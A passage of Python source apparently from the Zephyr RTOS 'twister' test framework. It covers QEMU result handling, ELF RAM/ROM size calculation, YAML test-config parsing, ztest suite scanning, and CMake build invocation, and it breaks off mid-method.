except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main)
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
stc_regex = re.compile(
br"""^\s* # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcse
\(\s*(?P<stc_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
registered_suite_regex_match = registered_suite_regex.search(
main_c)
if registered_suite_regex_match:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if not suite_regex_match and not has_registered_test_suites:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return ScanPathResult(
matches=None,
warnings=None,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
suite_run_match = suite_run_regex.search(main_c)
if suite_regex_match and not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
if suite_regex_match:
search_start = suite_regex_match.end()
else:
search_start = registered_suite_regex_match.end()
if suite_run_match:
search_end = suite_run_match.start()
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(main_c, search_start) \
.end()
achtung_matches = re.findall(
achtung_regex,
main_c[search_start:search_end])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[search_start:search_end])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return ScanPathResult(
matches=matches,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
